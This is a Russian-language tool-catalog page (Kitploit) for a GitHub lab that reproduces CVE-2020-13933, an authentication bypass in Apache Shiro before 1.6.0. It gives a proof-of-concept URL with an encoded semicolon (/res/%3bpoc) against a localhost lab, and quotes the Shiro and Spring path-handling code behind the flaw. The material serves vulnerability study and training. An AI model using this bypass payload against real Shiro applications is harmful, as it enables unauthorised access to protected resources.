Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-13933 — CVE-2020-13933 Полигон: уязвимость обхода аутентификации Shiro | Kitploit
Инструменты/GitHubGitHub/exp-docs/cve-2020-13933
Аутентификация и авторизацияАнализ уязвимостейЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubexp-docs/cve-2020-13933

CVE-2020-13933

CVE-2020-13933 Полигон: уязвимость обхода аутентификации Shiro

Репозиторий
1443 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

Лаборатория CVE-2020-13933

Уязвимость обхода аутентификации в shiro < 1.6.0


PoC

http://127.0.0.1:8080/res/%3bpoc

Среда лаборатории

Описание кода

  • ShiroConfig.java:
      Конфигурация прав доступа: при запросе ресурса /res/* выполняется 302-редирект на страницу входа для аутентификации
  • NameController.java:
      · /res/{name}: запрашивает ресурс с именем name (вызывает аутентификацию)
      · /res/: не запрашивает никаких ресурсов (не вызывает аутентификацию)

Проверка лаборатории

Если в маршруте запроса не указано имя ресурса, аутентификация не срабатывает и ресурс не возвращается: http://127.0.0.1:8080/res/

При указании имени ресурса в маршруте запроса выполняется 302-редирект на страницу аутентификации: http://127.0.0.1:8080/res/poc

При формировании специального PoC-запроса с указанием ресурса аутентификация не срабатывает и ресурс возвращается: http://127.0.0.1:8080/res/%3bpoc (%3b — URL-кодировка ;)

Места отладки уязвимости (DEBUG)

shiro-web-1.5.3.jar

root@kitploit:~
// org.apache.shiro.web.util.WebUtils.java
// line 111

public static String getPathWithinApplication(HttpServletRequest request) {
    return normalize(removeSemicolon(getServletPath(request) + getPathInfo(request)));
}

spring-web-5.2.5.RELEASE.jar

root@kitploit:~
// org.springframework.web.util.UrlPathHelper.java
// line 459

private String decodeAndCleanUriString(HttpServletRequest request, String uri) {
    uri = removeSemicolonContent(uri);
    uri = decodeRequestString(request, uri);
    uri = getSanitizedPath(uri);
    return uri;
}
Скачать инструмент